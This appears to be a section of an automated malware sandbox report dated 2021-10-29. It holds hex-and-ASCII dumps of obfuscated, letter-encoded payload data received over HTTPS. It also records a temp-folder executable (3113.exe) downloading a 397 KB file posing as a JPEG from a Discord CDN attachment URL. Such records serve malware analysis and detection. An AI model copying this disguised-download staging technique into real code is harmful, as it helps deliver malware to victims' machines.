                                                                                                                          2021-10-29 15:06:43 UTC1160INData Raw: 20 4f 20 4d 58 20 4f 20 71 4f 45 20 4f 20 71 71 57 20 4f 20 57 44 20 4f 20 58 44 20 4f 20 71 4f 4d 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 4d 58 20 4f 20 71 4a 4a 20 4f 20 6d 4d 20 4f 20 71 4f 45 20 4f 20 71 71 44 20 4f 20 71 4f 71 20 4f 20 71 71 6d 20 4f 20 4d 45 20 4f 20 45 45 20 4f 20 71 71 6d 20 4f 20 58 71 20 4f 20 71 71 71 20 4f 20 71 71 71 20 4f 20 71 4f 6d 20 4f 20 71 4f 45 20 4f 20 71 71 58 20 4f 20 57 6d 20 4f 20 71 71 71 20 4f 20 4d 58 20 4f 20 6d 4d 20 4f 20 71 71 71 20 4f 20 71 4f 58 20 4f 20 4d 4d 20 4f 20 45 71 20 4f 20 45 57 20 4f 20 44 44 20 4f 20 4d 4d 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 71 4f 71 20 4f 20 71 71 71 20 4f 20 45 44 20 4f 20 71 71 58 20 4f 20 58 4d 20 4f 20 57 71 20 4f 20 45 58 20 4f 20 71 4f 4f 20 4f 20 45 57 20 4f 20
                                                                                                                          Data Ascii: O MX O qOE O qqW O WD O XD O qOM O DD O qqX O MX O qJJ O mM O qOE O qqD O qOq O qqm O ME O EE O qqm O Xq O qqq O qqq O qOm O qOE O qqX O Wm O qqq O MX O mM O qqq O qOX O MM O Eq O EW O DD O MM O WO O EX O qOq O qqq O ED O qqX O XM O Wq O EX O qOO O EW O
                                                                                                                          2021-10-29 15:06:43 UTC1165INData Raw: 20 4f 20 4d 4d 20 4f 20 6d 4d 20 4f 20 71 4f 4a 20 4f 20 44 4d 20 4f 20 57 45 20 4f 20 45 71 20 4f 20 57 4f 20 4f 20 57 4f 20 4f 20 57 4f 20 4f 20 57 6d 20 4f 20 71 71 4d 20 4f 20 71 71 4d 20 4f 20 71 4f 57 20 4f 20 71 71 70 20 4f 20 45 4f 20 4f 20 71 4a 4f 20 4f 20 45 6d 20 4f 20 71 71 6d 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 58 70 20 4f 20 45 4d 20 4f 20 45 44 20 4f 20 71 71 4f 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 45 4d 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 4d 58 20 4f 20 58 57 20 4f 20 4d 45 20 4f 20 4d 4d 20 4f 20 58 4a 20 4f 20 57 70 20 4f 20 71 4f 4f 20 4f 20 45 4d 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 71 4f 71 20 4f 20 45 57 20 4f 20 6d 45 20 4f 20 71 4f 4f 20 4f 20 4d 4d 20 4f 20 71 71 4f 20 4f 20 58
                                                                                                                          Data Ascii: O MM O mM O qOJ O DM O WE O Eq O WO O WO O WO O Wm O qqM O qqM O qOW O qqp O EO O qJO O Em O qqm O qqX O qOO O Xp O EM O ED O qqO O DW O MO O EM O Xq O DW O qOO O MX O XW O ME O MM O XJ O Wp O qOO O EM O qqE O DW O XM O qOq O EW O mE O qOO O MM O qqO O X
                                                                                                                          2021-10-29 15:06:43 UTC1169INData Raw: 20 4f 20 58 57 20 4f 20 57 44 20 4f 20 45 57 20 4f 20 6d 70 20 4f 20 45 57 20 4f 20 44 44 20 4f 20 57 70 20 4f 20 58 4d 20 4f 20 71 4f 44 20 4f 20 71 4f 4f 20 4f 20 6d 58 20 4f 20 71 4f 70 20 4f 20 45 44 20 4f 20 45 71 20 4f 20 71 4f 6d 20 4f 20 71 4f 44 20 4f 20 57 45 20 4f 20 45 4f 20 4f 20 45 6d 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 71 4f 45 20 4f 20 58 45 20 4f 20 71 4f 4a 20 4f 20 71 4f 70 20 4f 20 45 4a 20 4f 20 6d 4d 20 4f 20 71 71 45 20 4f 20 45 4a 20 4f 20 71 4f 4a 20 4f 20 71 71 58 20 4f 20 71 4a 71 20 4f 20 58 6d 20 4f 20 4d 58 20 4f 20 4d 58 20 4f 20 71 4a 4a 20 4f 20 45 58 20 4f 20 6d 58 20 4f 20 4d 4f 20 4f 20 4d 45 20 4f 20 71 71 58 20 4f 20 58 4a 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 45 20 4f 20 44 44 20 4f 20 58 70 20 4f 20 71 4f
                                                                                                                          Data Ascii: O XW O WD O EW O mp O EW O DD O Wp O XM O qOD O qOO O mX O qOp O ED O Eq O qOm O qOD O WE O EO O Em O qqW O DW O qOE O XE O qOJ O qOp O EJ O mM O qqE O EJ O qOJ O qqX O qJq O Xm O MX O MX O qJJ O EX O mX O MO O ME O qqX O XJ O Eq O WJ O DE O DD O Xp O qO
                                                                                                                          2021-10-29 15:06:43 UTC1173INData Raw: 4d 20 4f 20 71 71 70 20 4f 20 70 45 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 71 4f 58 20 4f 20 71 4f 4d 20 4f 20 71 4f 4a 20 4f 20 71 4f 4a 20 4f 20 71 4a 71 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 71 4a 4a 20 4f 20 71 4f 6d 20 4f 20 70 45 20 4f 20 71 70 20 4f 20 71 4f 20 4f 20 70 45 20 4f 20 71 71 4d 20 4f 20 71 4f 58 20 4f 20 71 4f 6d 20 4f 20 71 4a 4a 20 4f 20 71 4f 44 20 4f 20 71 4f 6d 20 4f 20 71 4a 4f 20 4f 20 71 71 45 20 4f 20 71 4a 4a 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4a 4a 20 4f 20 71 71 45 20 4f 20 71 4f 57 20 4f 20 4d 4d 20 4f 20 71 4a 4a 20 4f 20 71 71 70 20 4f 20 71 71 6d 20 4f 20 71 71 70 20 4f 20 4d 45 20 4f 20 71 71 58 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 70 45
                                                                                                                          Data Ascii: M O qqp O pE O qqO O pE O qqW O qOX O qOM O qOJ O qOJ O qJq O pE O qOO O pE O ME O qJJ O qOm O pE O qp O qO O pE O qqM O qOX O qOm O qJJ O qOD O qOm O qJO O qqE O qJJ O pE O qqW O pE O qJJ O qqE O qOW O MM O qJJ O qqp O qqm O qqp O ME O qqX O pE O MM O pE
                                                                                                                          2021-10-29 15:06:43 UTC1177INData Raw: 4f 20 71 71 6d 20 4f 20 71 4f 6d 20 4f 20 71 4f 6d 20 4f 20 70 45 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 4d 58 20 4f 20 71 4f 58 20 4f 20 4d 58 20 4f 20 71 71 4a 20 4f 20 71 71 71 20 4f 20 71 4f 71 20 4f 20 71 4f 44 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4f 6d 20 4f 20 71 4f 57 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 71 6d 20 4f 20 71 71 44 20 4f 20 71 4f 70 20 4f 20 71 4f 44 20 4f 20 71 4f 44 20 4f 20 71 4f 4d 20 4f 20 4d 58 20 4f 20 71 4f 44 20 4f 20 71 4f 4f 20 4f 20 4d 45 20 4f 20 71 4f 4a 20 4f 20 71 71 58 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 70 4a 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 71 4f 4d 20 4f 20 71 4f 58 20 4f 20 71 4f
                                                                                                                          Data Ascii: O qqm O qOm O qOm O pE O qqO O pE O qqq O MX O qOX O MX O qqJ O qqq O qOq O qOD O qqO O pE O qqW O pE O qOm O qOW O qOO O pE O qOq O pE O qqD O qqm O qqD O qOp O qOD O qOD O qOM O MX O qOD O qOO O ME O qOJ O qqX O qOJ O pE O pJ O pE O qOW O qOM O qOX O qO
                                                                                                                          2021-10-29 15:06:43 UTC1181INData Raw: 4d 45 20 4f 20 71 4f 58 20 4f 20 71 71 57 20 4f 20 71 4a 4a 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 71 70 20 4f 20 71 71 6d 20 4f 20 71 4f 71 20 4f 20 4d 4d 20 4f 20 71 71 44 20 4f 20 71 71 4f 20 4f 20 71 4f 6d 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 70 45 20 4f 20 71 71 4d 20 4f 20 71 71 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 71 20 4f 20 71 4f 6d 20 4f 20 70 45 20 4f 20 4d 58 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 71 70 20 4f 20 71 4f 71 20 4f 20 71 4a 71 20 4f 20 71 4f 6d 20 4f 20 71 71 4f 20 4f 20 71 4f 58 20 4f 20 71 71 4a 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 70 45 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 4d 58 20 4f 20 71 4f 58 20 4f 20 71 4a 4a 20 4f 20 71 71 4a 20 4f 20 71 4f 4d 20 4f 20 71 4f 44 20 4f 20
                                                                                                                          Data Ascii: ME O qOX O qqW O qJJ O pE O qqW O pE O qqp O qqm O qOq O MM O qqD O qqO O qOm O MM O pE O ME O pE O qqM O qqE O qJO O qOq O qOm O pE O MX O pE O qOO O qqp O qOq O qJq O qOm O qqO O qOX O qqJ O pE O qOX O pE O MX O qOM O MX O qOX O qJJ O qqJ O qOM O qOD O
                                                                                                                          2021-10-29 15:06:43 UTC1185INData Raw: 71 71 4a 20 4f 20 71 4f 6d 20 4f 20 71 4f 45 20 4f 20 4d 58 20 4f 20 71 4f 4f 20 4f 20 4d 58 20 4f 20 71 4f 44 20 4f 20 71 71 45 20 4f 20 71 4f 57 20 4f 20 71 71 4f 20 4f 20 71 4f 4a 20 4f 20 71 4a 71 20 4f 20 4d 58 20 4f 20 4d 58 20 4f 20 70 45 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 4f 71 20 4f 20 4d 58 20 4f 20 71 4f 6d 20 4f 20 71 4f 58 20 4f 20 71 4a 4f 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 71 71 58 20 4f 20 4d 45 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 71 44 20 4f 20 71 4f 58 20 4f 20 71 71 4f 20 4f 20 71 71 70 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 71 4d 20 4f 20 71 4a 4a 20 4f 20 71 4f 57 20 4f 20 71 4f 6d 20 4f 20
                                                                                                                          Data Ascii: qqJ O qOm O qOE O MX O qOO O MX O qOD O qqE O qOW O qqO O qOJ O qJq O MX O MX O pE O qOq O pE O qqD O qOq O MX O qOm O qOX O qJO O pE O qOO O pE O qqq O qqX O ME O pE O qOW O pE O qqD O qqD O qOX O qqO O qqp O pE O MM O pE O qOO O qqM O qJJ O qOW O qOm O
                                                                                                                          2021-10-29 15:06:43 UTC1189INData Raw: 20 71 71 71 20 4f 20 71 4f 4f 20 4f 20 71 4f 71 20 4f 20 71 4f 6d 20 4f 20 71 4a 4f 20 4f 20 70 45 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 71 4a 71 20 4f 20 71 4f 4f 20 4f 20 71 4f 4d 20 4f 20 71 71 70 20 4f 20 71 71 44 20 4f 20 71 4f 4a 20 4f 20 4d 45 20 4f 20 4d 4d 20 4f 20 71 71 4a 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 71 71 71 20 4f 20 71 71 57 20 4f 20 71 4f 4f 20 4f 20 71 71 57 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 4d 58 20 4f 20 71 4f 45 20 4f 20 71 71 4d 20 4f 20 71 4a 4f 20 4f 20 71 4f 4d 20 4f 20 71 4f 4f 20 4f 20 71 71 58 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 70 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 45 20 4f 20 71 4a 71 20 4f 20 71 4a 4f 20 4f 20 71 4f 70 20 4f 20 71 71 44 20 4f 20 71 4a 4a 20 4f 20 71
                                                                                                                          Data Ascii: qqq O qOO O qOq O qOm O qJO O pE O qOq O pE O qJq O qOO O qOM O qqp O qqD O qOJ O ME O MM O qqJ O pE O ME O pE O qqq O qqq O qqW O qOO O qqW O MX O qOM O MX O qOE O qqM O qJO O qOM O qOO O qqX O pE O qOX O pE O qJO O qOE O qJq O qJO O qOp O qqD O qJJ O q
                                                                                                                          2021-10-29 15:06:43 UTC1192INData Raw: 20 4f 20 71 4f 71 20 4f 20 71 4f 45 20 4f 20 71 71 71 20 4f 20 71 4a 4a 20 4f 20 71 71 71 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 71 4f 4d 20 4f 20 71 4a 71 20 4f 20 71 71 4a 20 4f 20 71 4f 6d 20 4f 20 71 4f 4f 20 4f 20 71 4a 4a 20 4f 20 71 71 71 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 44 71 20 4f 20 70 45 20 4f 20 71 4a 4f 20 4f 20 4d 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 4f 20 4f 20 71 71 45 20 4f 20 71 71 45 20 4f 20 70 45 20 4f 20 70 4a 20 4f 20 70 45 20 4f 20 71 71 4d 20 4f 20 71 71 70 20 4f 20 71 4f 4d 20 4f 20 71 71 4a 20 4f 20 71 71 4d 20 4f 20 71 71 58 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 70 20 4f 20 71 4f 6d 20 4f 20 71 4f 58 20 4f 20 71 4f 4d 20 4f 20 71 71 57 20 4f 20 4d 45 20 4f 20 71
                                                                                                                          Data Ascii: O qOq O qOE O qqq O qJJ O qqq O pE O qqD O pE O ME O qOM O qJq O qqJ O qOm O qOO O qJJ O qqq O qOq O pE O Dq O pE O qJO O ME O qJO O qOO O qqE O qqE O pE O pJ O pE O qqM O qqp O qOM O qqJ O qqM O qqX O pE O qOO O pE O qqp O qOm O qOX O qOM O qqW O ME O q
                                                                                                                          2021-10-29 15:06:43 UTC1197INData Raw: 20 71 71 58 20 4f 20 71 4f 44 20 4f 20 71 71 6d 20 4f 20 71 71 4d 20 4f 20 71 4f 4f 20 4f 20 71 4f 57 20 4f 20 71 4f 70 20 4f 20 71 4a 71 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 4f 44 20 4f 20 71 71 4d 20 4f 20 4d 4d 20 4f 20 71 71 4f 20 4f 20 71 4f 58 20 4f 20 71 71 6d 20 4f 20 71 4a 71 20 4f 20 71 4f 4a 20 4f 20 71 71 4a 20 4f 20 71 71 71 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 71 4f 70 20 4f 20 4d 58 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4a 71 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 71 71 57 20 4f 20 71 4f 58 20 4f 20 71 71 57 20 4f 20 71 4f 45 20 4f 20 4d 58 20 4f 20 71 71 4f 20 4f 20 71 71 6d 20 4f 20 70
                                                                                                                          Data Ascii: qqX O qOD O qqm O qqM O qOO O qOW O qOp O qJq O pE O qqW O pE O qqD O qOD O qqM O MM O qqO O qOX O qqm O qJq O qOJ O qqJ O qqq O qOJ O pE O MM O pE O qOJ O qOp O MX O qqX O qOO O pE O qqW O pE O qJq O qqM O MX O qqW O qOX O qqW O qOE O MX O qqO O qqm O p
                                                                                                                          2021-10-29 15:06:43 UTC1201INData Raw: 70 45 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 71 4f 4d 20 4f 20 71 4f 45 20 4f 20 71 4f 58 20 4f 20 71 71 44 20 4f 20 71 71 57 20 4f 20 71 71 6d 20 4f 20 4d 58 20 4f 20 4d 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 71 71 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 44 20 4f 20 4d 4d 20 4f 20 71 4f 4a 20 4f 20 71 71 57 20 4f 20 71 4a 4f 20 4f 20 71 71 44 20 4f 20 71 71 6d 20 4f 20 71 71 71 20 4f 20 71 4a 4f 20 4f 20 70 45 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 58 20 4f 20 71 4f 45 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 4d 4d 20 4f 20 71 71 4a 20 4f 20 71 4a 4a 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 4d 58 20 4f 20 71 4f 4a 20 4f 20 71 4f 4f 20 4f 20 70
                                                                                                                          Data Ascii: pE O MM O pE O qOM O qOE O qOX O qqD O qqW O qqm O MX O ME O qOO O pE O qqq O pE O qOX O qqE O qJO O qOD O MM O qOJ O qqW O qJO O qqD O qqm O qqq O qJO O pE O qqO O pE O qqX O qOE O qqM O MX O MX O qqM O MM O qqJ O qJJ O pE O qOJ O pE O MX O qOJ O qOO O p
                                                                                                                          2021-10-29 15:06:43 UTC1205INData Raw: 20 4d 4d 20 4f 20 4d 4d 20 4f 20 71 4f 57 20 4f 20 71 4f 71 20 4f 20 71 71 57 20 4f 20 71 71 4a 20 4f 20 71 4f 70 20 4f 20 71 71 4f 20 4f 20 71 4f 57 20 4f 20 71 71 45 20 4f 20 71 71 57 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 71 4a 20 4f 20 71 71 57 20 4f 20 4d 58 20 4f 20 71 71 4f 20 4f 20 71 71 71 20 4f 20 4d 45 20 4f 20 4d 45 20 4f 20 71 4f 71 20 4f 20 4d 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 71 6d 20 4f 20 71 71 4f 20 4f 20 71 4f 45 20 4f 20 71 4f 58 20 4f 20 71 4f 70 20 4f 20 71 71 4f 20 4f 20 71 4f 4d 20 4f 20 71 4f 70 20 4f 20 71 4f 57 20 4f 20 71 4f 70 20 4f 20 71 4f 4d 20 4f 20 70 45 20 4f 20 71 4f 70 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 71 4f 4a
                                                                                                                          Data Ascii: MM O MM O qOW O qOq O qqW O qqJ O qOp O qqO O qOW O qqE O qqW O qOJ O pE O qOJ O pE O qOO O qqJ O qqW O MX O qqO O qqq O ME O ME O qOq O ME O qOW O pE O qOW O pE O qqm O qqO O qOE O qOX O qOp O qqO O qOM O qOp O qOW O qOp O qOM O pE O qOp O pE O MM O qOJ
                                                                                                                          2021-10-29 15:06:43 UTC1209INData Raw: 71 4f 4f 20 4f 20 71 4a 4f 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 71 4f 45 20 4f 20 71 4f 57 20 4f 20 71 4a 71 20 4f 20 4d 45 20 4f 20 71 4f 70 20 4f 20 71 71 71 20 4f 20 71 4f 70 20 4f 20 71 4f 4f 20 4f 20 71 71 58 20 4f 20 4d 4d 20 4f 20 71 4f 4f 20 4f 20 71 4f 45 20 4f 20 71 71 71 20 4f 20 70 45 20 4f 20 71 4f 70 20 4f 20 70 45 20 4f 20 71 4a 71 20 4f 20 71 4f 4a 20 4f 20 71 4f 71 20 4f 20 71 4f 70 20 4f 20 71 71 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 70 4a 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 4d 45 20 4f 20 71 4f 58 20 4f 20 71 71 4d 20 4f 20 71 4f 44 20 4f 20 71 4a 71 20 4f 20 70 45 20 4f 20 45 70 20 4f 20 70 45 20 4f 20 71 71 6d 20 4f 20 71 71 70 20 4f 20 4d 58 20 4f 20 71 4f 6d 20 4f
                                                                                                                          Data Ascii: qOO O qJO O qqO O pE O qOW O pE O qOX O qOE O qOW O qJq O ME O qOp O qqq O qOp O qOO O qqX O MM O qOO O qOE O qqq O pE O qOp O pE O qJq O qOJ O qOq O qOp O qqE O qqW O pE O pJ O pE O qqW O ME O qOX O qqM O qOD O qJq O pE O Ep O pE O qqm O qqp O MX O qOm O
                                                                                                                          2021-10-29 15:06:43 UTC1213INData Raw: 4f 20 71 4a 4a 20 4f 20 4d 45 20 4f 20 71 4f 57 20 4f 20 4d 58 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 71 4a 4f 20 4f 20 4d 4d 20 4f 20 71 71 6d 20 4f 20 71 71 57 20 4f 20 71 71 45 20 4f 20 71 71 71 20 4f 20 71 4f 44 20 4f 20 71 71 71 20 4f 20 70 45 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 71 71 4a 20 4f 20 71 4f 70 20 4f 20 71 4f 71 20 4f 20 71 71 45 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4f 44 20 4f 20 71 71 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 4d 4a 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 4f 6d 20 4f 20 71 4f 4f 20 4f 20 71 4f 4a 20 4f 20 4d 58 20 4f 20 71 4f 58 20 4f 20 71 4a 4a 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 71
                                                                                                                          Data Ascii: O qJJ O ME O qOW O MX O pE O qOX O pE O qOX O qJO O MM O qqm O qqW O qqE O qqq O qOD O qqq O pE O qOq O pE O qqJ O qOp O qOq O qqE O pE O qqW O pE O qOD O qqE O qOO O qOD O qOW O pE O MJ O pE O qOO O qOD O qOm O qOO O qOJ O MX O qOX O qJJ O qOO O qOD O qq
                                                                                                                          2021-10-29 15:06:43 UTC1229INData Raw: 4a 20 4f 20 71 4a 70 20 4f 20 57 4a 20 4f 20 44 58 20 4f 20 57 71 20 4f 20 57 6d 20 4f 20 44 4d 20 4f 20 57 45 20 4f 20 57 6d 20 4f 20 57 44 20 4f 20 6d 57 20 4f 20 44 4d 20 4f 20 57 71 20 4f 20 57 4f 20 4f 20 57 70 20 4f 20 6d 57 20 4f 20 6d 4d 20 4f 20 6d 4d 20 4f 20 44 45 20 4f 20 44 4d 20 4f 20 6d 57 20 4f 20 44 44 20 4f 20 45 4f 20 4f 20 44 45 20 4f 20 6d 4d 20 4f 20 6d 57 20 4f 20 6d 58 20 4f 20 57 44 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 57 4f 20 4f 20 44 44 20 4f 20 44 4d 20 4f 20 6d 4d 20 4f 20 6d 58 20 4f 20 57 71 20 4f 20 6d 4d 20 4f 20 57 44 20 4f 20 71 4a 57 20 4f 20 4d 4a 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 71 20 4a 71 20 44 58 20 4f 20 71 71 6d 20 4f 20 71 4f 57 20 4f 20 71 71 58 20 4f 20 71 4f 71 20 4f 20
                                                                                                                          Data Ascii: J O qJp O WJ O DX O Wq O Wm O DM O WE O Wm O WD O mW O DM O Wq O WO O Wp O mW O mM O mM O DE O DM O mW O DD O EO O DE O mM O mW O mX O WD O mX O mX O WO O DD O DM O mM O mX O Wq O mM O WD O qJW O MJ O mX O mX O mX O mX O q Jq DX O qqm O qOW O qqX O qOq O
                                                                                                                          2021-10-29 15:06:43 UTC1245INData Raw: 20 4a 20 4a 20 58 20 4a 20 4a 20 4a 20 71 70 20 4f 20 6d 20 71 45 20 71 4a 4d 20 4a 57 20 71 6d 20 71 6d 20 71 45 20 71 4a 4d 20 4a 4d 20 71 45 20 71 4a 4d 20 70 70 20 44 20 4f 20 71 20 71 6d 20 71 45 20 71 4a 4d 20 70 45 20 44 20 4f 20 71 20 71 58 20 71 4a 58 20 71 70 45 20 71 6d 20 45 20 45 20 57 20 58 20 58 20 58 20 71 4f 20 4a 20 70 20 4f 20 4f 20 58 20 4a 45 20 45 20 71 70 20 58 20 58 20 58 20 71 58 20 71 4a 4d 20 6d 57 20 71 58 20 71 4a 4d 20 6d 4d 20 71 58 20 71 4a 4d 20 57 70 20 71 58 20 71 4a 4d 20 57 45 20 4a 20 4a 20 71 58 20 71 4a 4d 20 57 70 20 71 58 20 71 4a 4d 20 57 45 20 4a 20 4a 20 57 20 70 4a 20 4f 20 71 58 20 71 4a 4d 20 6d 4d 20 57 20 70 4a 20 4f 20 71 58 20 71 4a 4d 20 57 70 20 57 20 70 4a 20 4f 20 71 58 20 71 4a 4d 20 57 45 20 6d 20
                                                                                                                          Data Ascii: J J X J J J qp O m qE qJM JW qm qm qE qJM JM qE qJM pp D O q qm qE qJM pE D O q qX qJX qpE qm E E W X X X qO J p O O X JE E qp X X X qX qJM mW qX qJM mM qX qJM Wp qX qJM WE J J qX qJM Wp qX qJM WE J J W pJ O qX qJM mM W pJ O qX qJM Wp W pJ O qX qJM WE m


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          2192.168.2.749813162.159.134.233443C:\Users\user\AppData\Local\Temp\3113.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-10-29 15:06:45 UTC1254OUTGET /attachments/893177342426509335/903333369742491648/1E88D378.jpg HTTP/1.1
                                                                                                                          Host: cdn.discordapp.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2021-10-29 15:06:45 UTC1254INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:45 GMT
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 396853
                                                                                                                          Connection: close
                                                                                                                          CF-Ray: 6a5d4f44ac714ecd-FRA
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Age: 76270
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          ETag: "9f10fbc5d30ca119af4f9f1c1ff1eb60"
                                                                                                                          Expires: Sat, 29 Oct 2022 15:06:45 GMT
                                                                                                                          Last-Modified: Thu, 28 Oct 2021 17:24:18 GMT
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                          Cf-Bgj: h2pri
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          x-goog-generation: 1635441858509476
                                                                                                                          x-goog-hash: crc32c=tZ9RsQ==
                                                                                                                          x-goog-hash: md5=nxD7xdMMoRmvT58cH/HrYA==
                                                                                                                          x-goog-metageneration: 1
                                                                                                                          x-goog-storage-class: STANDARD
                                                                                                                          x-goog-stored-content-encoding: identity
                                                                                                                          x-goog-stored-content-length: 396853
                                                                                                                          X-GUploader-UploadID: ADPycdv_exDd0YjZWPamre1oLYm1pelNgMCJxOtS1umaL_LlSi5vu5DvuxJ3Nk7VbkHSDtwLRDhsHgLUT-fTrgHcHGQ
                                                                                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K91L4PrhIKEno46q9Ac8hY32DQXIvFZTovGlg2%2FHznksL%2Ftc6bG69VZhcWbmLyLiJ5d7aQ3kofRYQPCsJ8OwcDt3FTeZcfoQwNJ0RjdoKTkffQhJ8h9QvBjjki2Q6puTmy0MTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          2021-10-29 15:06:45 UTC1255INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                          Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
